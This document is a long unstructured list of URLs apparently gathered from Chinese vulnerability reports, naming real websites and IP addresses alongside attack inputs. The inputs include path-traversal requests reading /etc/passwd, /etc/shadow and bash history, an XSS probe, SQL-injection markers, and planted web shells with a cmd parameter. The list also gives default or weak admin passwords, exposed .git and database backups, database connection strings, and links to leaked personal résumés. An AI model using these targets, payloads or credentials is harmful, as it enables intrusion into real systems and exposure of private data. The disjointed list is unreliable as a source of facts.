http://zeaie.zjedu.org/admin/login.php 
http://www.xinhucaifu.com/news.php?id=198 http://www.datebao.com/pserson/center/email/send?email=XXXXDCC@163.com http://pk.tom.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/resin-web.xml http://pk.tom.com/crossdomain.xml zyyd.media.open.com.cn/picexam/picexam_moni.asp?course_id=0002 http://zyyd.media.open.com.cn/picexam/examshowpic_test.asp?picid=12 http://www.apcl.zju.edu.cn/manage/admin/ http://www.wooyun.org/bugs/wooyun-2010-0133269/trace/d246c618a6cbd30397c92605a122d80b http://app.admin5.com http://www.qts-railway.com.cn http://qts.rails.cn/rqts/infor.jsp?company=1 http://vms.shunde.gov.cn/login.aspx http://www.tcsl.com.cn/ http://219.150.85.228:8888/ http://sso.daojia.58.com/index/index.do https://in.jimubox.com https://enchanter.jimubox.com/ http://192.168.3.198/zentaopms/www/user-login.html http://122.224.218.140:89/login.do http://122.224.218.140:89/login.do?message=103&verify= http://123.127.137.221:8080/CXPT/ http://**.**.**.**/classroom/tClassRoomList.action?accounts=1028585 http://**.**.**.**/space/notice/tnoticeContent.action?id=391&accounts=1007559 http://**.**.**/Index/Index http://nczx.ufida.com.cn www.998.com http://www.998.com http://www.998.com/MyStoredValueCard/ChooseRechargeWay?cardNo=卡号&cardType=0&userName=%E9%99%88%E7%94%9F&phone=手机号&rechargeMoney=1&operateNo=订单号&payType=0&status=0 https://114.255.42.211/ http://192.168.10.2/login.htm http://192.168.10.13:8080/login.aspx客户电话系统存在弱口令admin/123456 http://192.168.10.7/Default.aspx shell:http://192.168.10.7/hack.asp http://10.0.33.43/海康威视弱口令,可检测机房服务器 http://10.53.96.175/login.jsp http://10.53.96.170:8080/ http://192.168.1.41:8080/seeyon/index.jsp华润医药的协调管理系统,致远A8 https://192.168.1.111/ http://192.168.190.5/ http://10.0.62.231/ http://10.0.62.148/homeview.htm磁带库默认口令 http://10.0.62.160:8080/Etiri/login.action智能信息管理系统 http://192.168.14.10:8080/ http://10.0.76.89/Home/User/Login?redirect_uri=http%3A%2F%2F5icrc-uat.crc.com.cn%2F http://10.0.76.223/华润电力 http://10.0.76.172/crland-isp/ 
http://webtestmer.gopay.com.cn/webtest/trade/tradeQuery4027.do inurl:http://**.**.**.**/portal/jsp/wssw/dkfp/do_cx.jsp?type=update&id= http://**.**.**.**/portal/jsp/wssw/dkfp/do_cx.jsp?type=show&id=38a111f3-64ff-4a80-8cc4-830eecb91e51 http://**.**.**.**/portal/jsp/wssw/dkfp/do_cx.jsp?type=show&id=716d9517-abb7-4026-8bae-593494fa528d http://bbs.iunios.com/config/config_ucenter.php= http://drops.wooyun.org/papers/7830 http://faq.comsenz.com/library/UCenter/api/api_index.htm### http://**.**.**.**/baoming/mami.html http://**.**.**.**/baoming.zip www.shanlinjinrong.com http://www.shanlinbao.com/ http://mail.shanlinjinrong.com/ http://**.**.**.**/chinzdinfo/jsp/main.jsp http://sh.nuomi.com/uc/comment/submit?from=baidu.com&callback=%3cimg%20 http://www.e-189.com/ http://www.e-189.com/webcontext_v2/download/dlist/dAndroid.jsp http://www.e-189.com/UploadServlet?id=../../../../../../../../../../../../../../etc/passwd http://www.e-189.com/UploadServlet?id=../../../../../../../../../../../../../../etc/shadow http://www.e-189.com/UploadServlet?id=../../../../../../../../../../../../../../root/.bash_history http://219.143.252.189:8088 admin:123456 http://special.ifensi.com/admin/index http://www.ccztgps.com/login.aspx http://3g.zol.com.cn/game/download.php?game_id=13104&view_type=1 http://astro.wap.ifeng.com:8080/asxh/Jiyun.ashx http://cloud.efly.cc/syslogic/userUpdate.php?opt=upPasswd&newPasswd=123456 http://test.m.ifensi.com/ http://m.ifensi.com/正式系统同样存在 www.cnzz.com http://www.umeng.com/ http://mtj.baidu.com/web/dashboard https://accounts.google.com/ServiceLogin?service=androiddeveloper&passive=1209600&continue=https://play.google.com/apps/publish/&followup=https://play.google.com/apps/publish/&authuser=0 gmail.com/wuxian2012 http://**.**.**.**/ http://**.**.**.**:7777/Htgl/Login/Default http://**.**.**.**:8080/GSweb/ei/Ei!certificate.action?id=8a80812d47fc3f990148a1208ddd00a5 http://**.**.**.**:8080/GSweb/ei/Ei!certificate.action?id=297edff83d79cc2e013d8186e3d7001e 
http://**.**.**.**:8080/GSweb/ei/Ei!certificate.action?id=297edff83d19c570013d1aba8dcb0031 http://122.96.93.126/ http://122.96.93.126/ http://sg.oneplus.cn:808 http://sg.oneplus.cn:808/ https://**.**.**.**/ http://**.**.**.** ftp://222.132.55.50/DmsWebMain.asp http://125.64.74.20:801/ http://222.88.118.5:801/DmsWebLogin.htm http://223.100.217.158:801/ http://**.**.**.**/wcm/pcpsms/login.jsp http://zentao.yy.com/index.php?m=my&f=index http://upload.app.m.letv.com/android/static/uninstall_question.html?pcode=010110106 http://**.**.**.**/About.asp?aid=1 http://**.**.**.**/ReadArticle.asp?typeid=826 http://**.**.**.**/ReadNews.asp?id=2187 www.ytsanchuan.com/en/search.aspx?kw=1&page=1 http://www.ytsanchuan.com/admin/ http://eltest.aviva-cofco.com.cn/ http://www.998.com/Account/FindPassword http://www.998.com/Account/GetValidateCodeValue www.998.com http://www.998.com http://erpn.fang.com/ http://wx.minanins.com/console/login/LoginForm.jsp http://mail.minanins.com:9001/console/login/LoginForm.jsp http://**.**.**.**/login.jsp http://**.**.**.**/ioop-bcs-web/sys/sys-pwd-question!modifyInput.do?modifyPwdToken=RzjaG2Wmx31qBrlj50PGu2u35V768BTAl5cN2ghOmb6DUJRVGmw38DGgs/MMzrZOlhzcTFM3e0hffx4Cn%2006ZA== http://v.v89.com:80/v89/show/漏洞点/ http://c3.cofco.com/ http://www.zhenfund.com/phpmyadmin/ http://**.**.**/pages/registration/pr_application-show.htmlpra_id=12000000000335488&rpi_id=799378229&cti_id=1&pti_id=0&start1=show&start2=s http://job.xueersi.cn/xuanpin/azpRes/detail.do?regUserId= site:job.xueersi.cn http://job.xueersi.cn/xuanpin/azpRes/detail.do?regUserId=1230 http://**.**.**.**/bugs/wooyun-2015-0131940上了首页,于是挖着看看 http://**.**.**.**/sc/product_details.aspx?c_kind=2&c_kind2=4&c_kind3=34&id=32 http://**.**.**.** www.meihua.info URL:http://kdjyxk.post.gov.cn/register_logout.do http://town.iuni.com/post/12482 http://**.**.**.**/sqsupdate/updateManage.jsp https://**.**.**.**:8080/web2013/order/myspace_ordered.jsp http://ichtf.dbw.cn:80/ http://www.100eshu.com 
http://user.100xuexi.com/login.aspx http://**.**.**.**/bugs/wooyun-2015-0131940 http://**.**.**.**/bugs/wooyun-2015-0133395 http://**.**.**.**/sc/about.aspx?c_kind=12&c_kind2=17 http://**.**.**.**/sc/feedback.aspx?c_kind=7&c_kind2=44 http://**.**.**.**/sc/Products.aspx?pc_key=seach&key=%C8%C8%CB%AE%C6%F7 http://**.**.**.**/video.aspx?c_kind=2&c_kind2=77 http://**.**.**.**/news_det.aspx?c_kind=2&c_kind2=77 http://**.**.**.**/sc/product_details.aspx?c_kind=2&c_kind2=4&c_kind3=34&id=32 http://**.**.**.**/sc/newsDetial.aspx?ID=439&c_kind=9&c_kind2=10 http://**.**.**.**/sc/product_details.aspx?c_kind=2&c_kind2=5&c_kind3=36&id=5 http://**.**.**.**/zhuanti/shlist.aspx?ID=1334&p_kind=&c_kind=206&c_kind2=214&c_kind3=217 http://219.143.252.220/yyoa/checkWaitdo.jsp?userID=1 https://github.com/MiaoJiHui/bysj_mjh/blob/e78bc5695e1afd14579ad27fb27fdd852cadaef4/bysj_mjh/WebRoot/WEB-INF/classes/com/bysj/test/mail.properties http://**.**.**.**/ http://**.**.**.**/index.php/main/forgetpwd http://**.**.**.**/ crm.longhoo.net/login.aspx http://**.**.**.**/ebp/index.jsp,江苏烟草网上订货平台,如图所示: http://**.**.**.**/bugs/wooyun-2010-0110737 inurl:/cms/searchManage/ http://**.**.**.**/cms/searchManage/search_process_nw.jsp http://**.**.**.**/cms/searchManage/search_process_hn.jsp http://**.**.**.**//cms/searchManage/search_process_sp.jsp http://**.**.**.**/cms/searchManage/search_process_gt.jsp http://**.**.**.**/cms/searchManage/search_process_rc.jsp http://**.**.**.**/cms/searchManage/search_process_hn.jsp http://**.**.**.**:80/bxcx.aspx http://**.**.**.**:80/bxcx.aspx http://210.40.30.21/invoker/JMXInvokerServlet http://bbs.zt-express.com:8008/doc/page/main.asp admin:12345 https://地址/src/system/addmanageuser.php?&IG_current_menu_name=系统配置&IG_current_submenu_name=管理设置 http://**.**.**.**/bugs/wooyun-2015-0119537 http://**.**.**.**/main/login.jsp http://**.**.**.**/upload/mas/message/image/ba57b8e14f0c9a71014f1d3b4e3b6014.jsp http://**.**.**.**/main/login.jsp http://**.**.**.**/main/login.jsp 
http://**.**.**.**/main/login.jsp http://**.**.**.**/main/login.jsp http://wms.fday.co/account/login http://www.dianping.com/.git/config http://**.**.**.**/index/index.aspx https://github.com/niexiaolong/xrm/blob/451be28b44190f6daa44b561d4770b35b2e51259/src/main/resources/logback.xml http://www.wochacha.com/ajax/getmode?bid= http://www.wochacha.com/newsqs/subjectlist?scid=0 http://www.wochacha.com/help/?selecttab=8 http://www.wochacha.com/index.php?m=Product&a=shoppingcart http://www.wochacha.com/index.php?m=History&a=index&p=2 http://114.112.82.120:8082/index.php http://114.112.82.120:8082/c.php kali:/srv/redis-2.8.19# redis_version:2.6.14 redis_git_sha1:00000000 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.1.2 process_id:471 run_id:089b0be0318f65d05daf9b101171c8a2680669e7 tcp_port:6379 uptime_in_seconds:25394685 uptime_in_days:293 lru_clock:1323876 used_memory:1167247632 used_memory_human:1.09G used_memory_rss:1195913216 used_memory_peak:1180578616 used_memory_peak_human:1.10G used_memory_lua:31744 mem_fragmentation_ratio:1.02 mem_allocator:jemalloc-3.2.0 rdb_last_save_time:1439301735 total_connections_received:704 total_commands_processed:9067939 keyspace_hits:4716006 keyspace_misses:2871824 latest_fork_usec:25296 role:master used_cpu_sys:201.55 used_cpu_user:203.62 used_cpu_sys_children:124.93 used_cpu_user_children:734.80 db0:keys=1007466,expires=0 db5:keys=2582,expires=0 http://**.**.**.**/login.do user:test passwd:123456 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://evonik.hiall.com.cn/php.php http://www.nwnu.edu.cn/cate.do?dept=0018 http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001198 http://125.64.74.20:8400 http://www.isilic.org/thread-3984-1-1.html http://wanmei.hiall.com.cn/admin.txt http://**.**.**.** http://**.**.**.**/install/abc.php http://jumei.ihrscloud.com/login/doLogin 
http://jumei.ihrscloud.com/uploads/projects/attatchments/1405498514249北京光辉海德猎头推荐-运维总监-杜鹏-16702014.doc http://jumei.ihrscloud.com/uploads/projects/attatchments/1409134485930云迈20140814-UED总监-常成 http://jumei.ihrscloud.com/uploads/projects/attatchments/1404808384042吴朝简历.doc http://jumei.ihrscloud.com/uploads/projects/attatchments/1403770074006高鹏 http://jumei.ihrscloud.com/uploads/projects/attatchments/1405676079508巩文+PHP工研发工程师+北京+第一资本猎头 http://114.251.242.156:7003/cas/login http://114.251.242.156:7003/system/warning.jsp http://demo.jsqqy.com/Login.aspx?ReturnUrl=%2fdefault.aspx&AspxAutoDetectCookieSupport=1 http://szdcs.jsqqy.com http://xczf.jsqqy.com/ kali:/home/clusterd# http://116.228.70.218:8080/snspam/homepage.asp http://5sing.kugou.com/getpass/reset?id=UID&token=TOKEN http://**.**.**.**/culture.php?act=article&id=550 http://bbs.corp.anjuke.com/?2 http://www.shouji56.com/soft/TianDiXing_95730/ http://try.suning.com/tps/mianfei/now/list.htm?currentpage=1&sort= http://**.**.**.**/Homepage/DownLogin.aspx http://**.**.**.**/ http://**.**.**.**/login.aspx http://cps.189.cn/ http://**.**.**.** http://**.**.**.**/login/login.aspx http://112.124.212.5/index.php/Institution/index/p/1/money/2/deadline/22 http://112.124.212.5/index.php/Institution/index/p/1/money/2/deadline/22 http://drops.wooyun.org/tips/604 http://124.127.49.91:7001/is/cmd.jsp?pwd=023&cmd=ps%20aux http://dfj.buaa.edu.cn/About.aspx?Aid=1 http://dfj.buaa.edu.cn/NewList.aspx?Typeid=7 http://222.74.2.54/phpmyadmin/ http://m.rongzi.com:80/ajax/GetProductByTagPageCity.ashx?city=www http://app.cnmo.com http://www.yifutu.com/zbfzzdyxuqiu.html?fdsTid=35714 http://zhuanti.club.women.sohu.com/user_webpage/webpage_checkview.php?webid=17814 http://**.**.**.**/basic_detail.asp?id=9 http://**.**.**.**/p_work.asp?id=3 http://**.**.**.**/p_sta.asp?id=3 http://**.**.**.**/zwftcontent.php?id=25199 http://**.**.**.**/gjSearchList.php?keyword=%22%2F%3E%3Csvg+onload%3Dalert%28%2F1%2F%29%3E http://dmoo.cofco.com/dmoo/ 
http://100w.55bbs.com/list.php?order=1 http://**.**.**.**/member/common/login/ http://**.**.**.**/Style/header/upload.php?uid=498 http://**.**.**.**/bugs/wooyun-2010-0123011 http://www.95598.ha.sgcc.com.cn:8100/console/login/LoginForm.jsp http://**.**.**.**/Login.aspx http://**.**.**.**/aspx/login.aspx?logout=1 http://**.**.**.**/aspx/login.aspx http://**.**.**.**/ http://www.wochacha.com/index/search?tp1=4&tp2=0&clid=1209 http://www.wochacha.com/index.php?m=Question&a=index&category=80 http://www.wochacha.com/index/search?q=1 http://www.wochacha.com/m/brand?brand_id= http://www.wochacha.com/directsale/search?tp1=34 http://www.wochacha.com/index/search?tp1=4&tp2=0 http://www.wochacha.com/index/search?tp1=4&tp2=0&clid=1209* http://sqlmap.org http://www.taohuichang.com/thc/goThirdPage http://zf.hntv.tv/wwwroot.rar http://**.**.**.**/Login.aspx http://mt.longtugame.com/mt.zip http://kfcloud.dper.com/login.html http://**.**.**.**/Public/login.html http://**.**.**.**/bugs/wooyun-2010-0122796,其实这个是CRM,不要搞成ERP啦~发现居然是通用。厂商没有标示啊,看看CNCERT怎么做吧~ http://**.**.**/general/ERP/LOGIN/index.php_ http://**.**.**/general/ERP/LOGIN/index.php_ http://**.**.**//general/ERP/LOGIN/index.php_ http://**.**.**/general/ERP/LOGIN/index.php_ http://**.**.**/general/ERP/LOGIN/index.php_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/app/SunshineCRM/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://**.**.**/general/ERP/LOGIN/_ http://m.dudu.ztgame.com/detail.php?d=../../../../../../etc/passwd http://m.dudu.ztgame.com/detail.php?d=../../../../../../usr/local/apache2/conf/httpd.conf http://www.luneng.com/Plugin/FileManage/uploadfile.aspx http://www.luneng.com/Upload/201508/youxiu.aspx http://www.luneng.com/Upload/201508/youxiu.aspx http://test.waimai.dianping.com http://test.waimai.dianping.com http://s.waimai.dianping.com http://s.waimai.dianping.com 
http://www.id68.cn/app/index/savepwd.html www.id68.cn http://service.zol.com.cn/survey_new/save_new.php http://124.251.14.82/1.txt url:http://www.pangthai.com/ http://**.**.**.** http://ips.huoyunren.com/ips.php?ips=ips http://wap.gz.10086.cn http://www.ksyun.com/ http://www.ksyun.com/data/ksyun/apply/e7def06e-7459-4c2e-b488-1d7bd02cb795.htm http://**.**.**.**/frontStage!queryMessage.action http://**.**.**.**/ http://gzly.12386.gov.cn/csrc/sh.web.onlinecall.validatePassWord.sh?queryCode=1&pwd=1 http://**.**.**.** http://**.**.**.**/administrator/admin_login.aspx http://ichtf.dbw.cn/ltd/enterprise.php?id=32146 http://radio.3g.cnfol.com/index.php?r=Radiostation/Detail&id=%E6%9D%A8%E6%9C%8B%E5%A8%81 http://radio.3g.cnfol.com/index.php?r=Radiostation/Dragonfly&id=8 http://**.**.**.**/Article.php?TableId=1&ChannelId=8&id=903 http://**.**.**.**/login.jsp http://cos.sto.cn:89/manager/admin/login.do http://**.**.**.**/admin/ http://roadshow.cnfol.com/show/13610?type=0&name=1&sort=0 http://att2.citysbs.com/hangzhou/soft/19louV5.5.1.20150811.apk http://fuss10.elemecdn.com/1.txt http://**.**.**.**:7001/console/login/LoginForm.jsp;ADMINCONSOLESESSION=1h92VLZGgGFsKBTPjjDJBRkVDTqltcQKmrJh8JGFqDFpnygMQ1hC!-1011254035 http://**.**.**.**:7002/console/login/LoginForm.jsp http://**.**.**.**:7002/console/login/LoginForm.jsp http://**.**.**.**:7002/console/login/LoginForm.jsp http://**.**.**.**:7002/console/login/LoginForm.jsp http://www.circ.gov.cn/tabid/5272/Default.aspx http://cloud.kugou.com/pma_kgweb243/setup/index.php?page=form&formset=Export#tab_Microsoft_Office http://**.**.**.**/ http://**.**.**.**/emlib4/format/release/aspx/book_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/book_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_arts_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_arts_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_zhaiyao.aspx?RUID= 
http://**.**.**.**/emlib4/format/release/aspx/eml_courseware_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_disk_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_disk_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_instrumental_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_instrumental_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_languagel_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/eml_languagel_zhaiyao.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_ZHAIYAO.aspx?RUID= http://**.**.**.**/emlib4/format/release/aspx/EML_VOCAL_ZHAIYAO.aspx?RUID= http://g7s.ucenter.huoyunren.com/login.html http://www.dbschenker-atoms.com/index.html http://en.chinacache.com/administrator.tar.gz http://en.chinacache.com/administrator/ http://bbs.zhanzhang.baidu.com/.git/config http://jw.cuc.edu.cn/academic/common/security/login.jsp http://**.**.**.**:8080/oa_server/App_Pages/App_page/News_update.aspx?ID=5 http://**.**.**.**/oa_server/App_Pages/App_page/News_update.aspx?ID=5 http://**.**.**.**:8080/oa_server/App_pages/App_page/FAQDetail_New.aspx?ID=798 http://**.**.**.**/oa_server/App_pages/App_page/FAQDetail_New.aspx?ID=798 http://**.**.**.**:8080/oa_server/App_Pages/App_page/User_managerupdate.aspx?userid=125 http://**.**.**.**/oa_server/App_Pages/App_page/User_managerupdate.aspx?userid=125 http://**.**.**.**:8080/oa_server/Page_App/Service_Page/LM_QuestionSelect.aspx?ID=3406 http://**.**.**.**/oa_server/Page_App/Service_Page/LM_QuestionSelect.aspx?ID=3406 http://www.bjsubway.com/hobbyist/regist.php http://www.bjsubway.com/hobbyist/image/human/20150812161923759.gif/1.php http://**.**.**.**/user/loginform.html http://vip.kangq.com/business.php?action=couponinfo&id=1&k=24* http://vip.kangq.com/business.php?action=couponinfo&id=1* http://sqlmap.org http://yb.**.**.**.**/ http://data.bank.cnfol.com/ index.php/bankdata/product/1/3 
Google:inurl:/opac/index.jsp http://wapp.baidu.com/mo/q/searchpage https://github.com/linzhijia/gitskills https://github.com/linzhijia/gitskills/blob/5ec9d74208ff77502e3d3a5fcc5643413bbacb34/ImportExcleUtil/WebRoot/WEB-INF/classes/jdbc.properties jdbc:mysql://dbm.t.com:3306/pl_merchant_db?zeroDateTimeBehavior=convertToNull jdbc:mysql://dbm.t.com:3306/pl_log_db?zeroDateTimeBehavior=convertToNull jdbc:mysql://dbm.t.com:3306/pl_product_db?zeroDateTimeBehavior=convertToNull jdbc:mysql://dbm.t.com:3306/gshop_db?zeroDateTimeBehavior=convertToNull http://ems.nawang.cn/ www.piaozhijia.cn https://github.com/Jihann/Lucene/blob/c50151d43f2b2d81482c21728062222f8d37bfc8/solr-home/solr/core0/conf/data-config.xml jdbc:mysql://61.4.82.138:23306/ticket0326?zeroDateTimeBehavior=convertToNull http://infoaudit.baihe.com/Login.action http://112.122.11.111/ http://112.122.11.111/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://112.122.11.111/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://www.2cto.com/Article/200609/12101.html http://new-bbs.maxthon.cn/uc_server http://www.fangxinmai.com/error/backOriUrl.htm http://1000y.sdo.com/web3/news_list.aspx?imageField=&Search=1 http://1000y.sdo.com/web3/news_list.aspx?imageField=&Search=1 http://**.**.**.**/Pages/Foreground/MainFrame.aspx?TargetKey=DriverLicenseResubmit# http://**.**.**.**/Pages/Foreground/Common/FeekbackList.aspx http://wooyun.org/bugs/wooyun-2015-0124663 http://**.**.**.**/bugs/wooyun-2015-0133424/trace/e7fb02e2b17b3529b7865d5eb5a62b77 http://**.**.**.**/sfpt/GeneralQuery.jsp?SelectCode=1 http://www.lib.sjtu.edu.cn/ http://www.lib.sjtu.edu.cn/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://**.**.**.**/phpinfo.php http://**.**.**.**/phpmyadmin/ http://**.**.**.**/u.php/ http://**.**.**.**/grid/portal/base/login.action 
http://**.**.**.**/bugs/wooyun-2010-0132689 http://**.**.**.**/22100/) https://**.**.**.** http://**.**.**.**/mart/admin/login.asp http://**.**.**.**/mart/syjh/buy_info.asp?prodid=510761%E2%80%98 http://**.**.**.**/news/show?id=20 http://**.**.**.**/comment/getcommenthtml/?psize=3&page=1&targetid=216&sj=1439398698776 http://www.laiqian.com/index.php?r=admin http://vlog.17173.com/space/comment/messagecount/id/40720731*.html https://github.com/kprrr/gitHub-longtai/blob/5ea550476d7b46752025ff19be8b904149bfc9d8/cor_joyea/WebRoot/WEB-INF/classes/jdbc.properties jdbc:mysql://112.124.53.224:3306/msxwdz2?useUnicode=true&characterEncoding=utf-8&zeroDateTimeBehavior=convertToNull http://partner.funshion.com/ http://www.pcjinrong.com/皮城金融主站存在sql注入漏洞,通过注入可获取到一万多名投资者的个人信息。 http://116.228.70.249:8080/accounts/login/ http://mail.yto.net.cn/ http://**.**.**/zcgl//xzgn/ss/bdgl.aspx_ http://**.**.**/gxzc//xzgn/ss/bdgl.aspx_ http://**.**.**/zcgl//xzgn/ss/bdgl.aspx_ http://**.**.**/zcgl//xzgn/ss/bdgl.aspx_ http://**.**.**/xzgn/ss/bdgl.aspx_ http://**.**.**/xzgn/ss/bdgl.aspx_ http://**.**.**/gxzc//xzgn/ss/bdgl.aspx_ http://**.**.**/zcgl/xzgn/ss/bdgl.aspx_ http://hui.ztems.com/AppUpgradeAdmin/login/toLogout.do http://**.**.**.**/#/Login http://121.52.235.232:8080/ http://121.52.235.235:8080/ http://**.**.**.**/ztbd.aspx?taskno=005001 http://www.jshbank.com:98/?i=205 http://**.**.**.**/website/RockPlan/TeacherList.aspx?CollegeNo=010 XX:XXXX:XX:XXX%p2p0 m.ifensi.com/index.php?m=fensi&c=stars_wap&a=add_comment http://voice.youyuan.com/ http://shequ.fang.com/i/xiaoquAjax.ashx http://zjc.sicnu.edu.cn/zjc-career-websys-2009/zjc-career/sd_zjc_career_login_stu_info.aspx http://oa.998.com/login/Login.jsp?logintype=1&gopage=&message=16 http://www.shanlinjinrong.com/ http://channel.wepiao.com/index.php?r=public/register https://**.**.**.**/主站存在sql注入漏洞通过注入漏洞,可以获取6万多用户信息。 application:8000 http://**.**.**.**/gzk/SubModule/CorpLookProject/ListForHasMakePackageLwSch.aspx?classid=1000 
http://**.**.**.**/gzk/SubModule/CorpLookProject/ListForHasMakePackage.aspx?dogid=121308 http://**.**.**.**/gzk/SubModule/CorpLookProject/ListForHasMakePackageLwSch.aspx?classid=1010 http://**.**.**.**/gzk/SubModule/CorpLookProject/ListForHasMakePackageSch.aspx http://**.**.**.**/edoas2/oa.jsp URL:http://jspx.sicnu.edu.cn/back/login.html http://svt.whut.edu.cn/show.asp?id=797 http://svt.whut.edu.cn/class.asp?id=329 http://**.**.**.**/Apply/SubmitLoginName.aspx http://**.**.**.**/p_zl.asp?id=2 http://**.**.**.**/p_load.asp?id=3 http://**.**.**.**/p_topic.asp?id=5 http://**.**.**.**/product.asp?id=331 http://**.**.**.**/work_detail.asp?id=96 http://**.**.**.**/work_detail3.asp?id=125 http://**.**.**.**/work_detail2.asp?id=68 http://**.**.**.**/Website/ywzn01.jsp?id=900 http://**.**.**.**/xgweb/App_Themes/ http://**.**.**.**/xgweb/WebSite/ http://**.**.**.**/xgweb/Css/ http://**.**.**.**/assess/index.jsp http://ku.games.renren.com/?proid=19 http://localhost:80/univ/xsexam/JSON/AppExamService.ashx?number=20&token=d9f50069-ec9e-451f-8a8d-2405edc82f45&refreshType=new&refreshTime=0&examname= http://www.nuochencaifu.com/ http://www.haihengdai.com/ http://www.888yixinwang.com/ http://www.huifengjinrong.cn/ http://www.hnhsjr.com/ http://42.96.189.69/ http://www.shangced.com/ http://114.215.135.76/ https://121.42.142.169/ http://www.huifengjinrong.cn/测试 http://221.237.153.41:8888/Login.aspx http://pan.baidu.com/s/1kT8aQWn http://pan.baidu.com/s/1ntsxJiL http://**.**.**.**/products_view.asp?id=12114 http://**.**.**.**/admin http://**.**.**.**:8089/user/user_fav.aspx?id=1 http://**.**.**.**:8089/user/book_add_readnums.aspx?bookid=27248 http://**.**.**.**:8089/user/user_remark_show.aspx?id=7 http://www.haodai.com/h5/hdb/index.html http://**.**.**.**/bugs/wooyun-2010-0116322密码还是没改 http://**.**.**.**/bugs/wooyun-2010-0102477还是没有升级strust2 http://**.**.**.**/bugs/wooyun-2010-0102012这个也是 http://**.**.**.**/yh/早就被谁搞过了 
http://**.**.**.**/YH/BookList.aspx?con=0000000700030001本来这是个注入,不过被谁删了。 http://portal.crcchem.com http://portal.crcchem.com/tools/SWFUpload/upload.jsp http://**.**.**.** http://app.wzdai.com/app/user/appCZMM.html http://**.**.**.**/resume/resume-show.php?id=8000 http://en.syau.edu.cn/other/n_show.asp?D_id=744 http://en.syau.edu.cn/Academics/index_1.asp?cataid=A01840012 http://coupon.ddmap.com/couponUgc.jsp?mapid=21 http://114.80.178.225/ http://114.80.178.225:7001/console/login/LoginForm.jsp http://61.234.54.111 ftp://61.234.54.111/ ftp://61.234.54.111/kaoshi.rar ftp://61.234.54.111/MapSystem.rar ftp://61.234.54.111/迁移.rar http://moji.sprite.com.cn/pages/index.aspx http://www.szhk.com.cn/admin/index.php?m=Config&a=qijian http://www.szhk.com.cn/index.php?m=Product&a=show&id=104 http://www.kkkdai.com/invest/full_success/a20150600001.html http://shunchangcaifu.com/invest/full_success/a20150600004.html http://wenbangjinrong.com/invest/full_success/a20150500023.html http://www.zhuoxincf.com/invest/full_success/a20150400033.html http://www.lurongdai.com/invest/full_success/a20150800007.html http://www.hengdacaifu.com/invest/full_success/a20150800031.html http://wangdai168.com/invest/full_success/a20150800009.html http://www.xuefudai.com/invest/full_success/a20150800007.html http://www.mingfucaifu.com http://www.donglingdai.com http://www.zndai.com http://www.qduoduo.net http://www.xsbvc.com http://www.mingyedai.com http://yolo100.net http://www.btzhd.com http://ludongchuangtou.com http://xinruncaifu.com http://chengyuecaifu.com http://leyuancaifu.com http://zhuoxincf.com http://www.hengdacaifu.com http://fuhuajinrong.com http://donglingdai.com http://bccht.com http://qinghuacaifu.com http://zhengdaguquan.com http://sdxpct.com http://miaomiaocaifu.com http://www.hongshuncaifu.com http://longmaocaifu.com http://www.91toufang.com http://www.yikuaict.com http://www.jufuyidai.com http://haohaochuangtou.com http://www.153mh.com 
http://sys-gs.nsmc.edu.cn/yjsjwgl/xsxxwh.do?method=xsxxwh_ck¶m=9267&rand=0.335544942713089&mkdm=N010580 http://sys-gs.nsmc.edu.cn/yjsjwgl/xsxxwh.do?method=xsxxwh_ck¶m=9267 http://**.**.**.**/admin/index.asp http://**.**.**.**/bugs/wooyun-2014-076085 http://**.**.**.**/bugs/wooyun-2015-0108176 http://**.**.**.**/syzx/admin/ https://**.**.**.**/hualiang0537/hlbase/blob/be0cdd552f9d094b2cfabf88db3a24c30ce22e3b/hlbase/src/main/resources/config.properties http://www.heinet.cn/wordpress/ http://www.heinet.cn/zabbix/ http://www.heinet.cn/cacti/ https://**.**.**.**/api4me/horse/blob/56917c49d4eca5bd15644c6f548a3af5744c7732/go/src/mail.go_ http://sist.sysu.edu.cn/main/news/MasterTopTwoNews.aspx?no=104&pId=104 https://github.com/devin1982/dbmonitor/blob/6b322d096c7c8493629af4ca85fd8470d2763231/application/libraries/mailer.php www.x.com.cn https://github.com/seraphlnWu/file_services/blob/c8f99d22a470d74ae8e96d8d45e4d855600bec28/config.py http://**.**.**.**/stm/admin/user/login.action https://**.**.**.**/liuchaox/welab_bi/blob/95e027b34b0b2845c0db3e1bd767d99d1a9631a6/etl/src/kettle/kettle.properties https://**.**.**.**/appweb/newasf/blob/5deca12c9ff743e3544c2cf140b4542c4f003914/APP/Conf/web_config.php http://training.263.net/ http://training.263.net/data/ http://training.263.net/data/backup/ http://training.263.net/data/backup/1343384220.sql http://training.263.net/data/enclosure/temp/CJQ/b681673698.php http://training.263.net/data/enclosure/temp/CJQ/b681673698.php?dir=/ http://27.252.124.89:88/doc/page/main.asp http://27.224.76.230:81/doc/page/main.asp http://27.224.238.55:81/doc/page/main.asp http://27.226.76.101:81/doc/page/main.asp http://27.208.24.227:9000/doc/page/main.asp 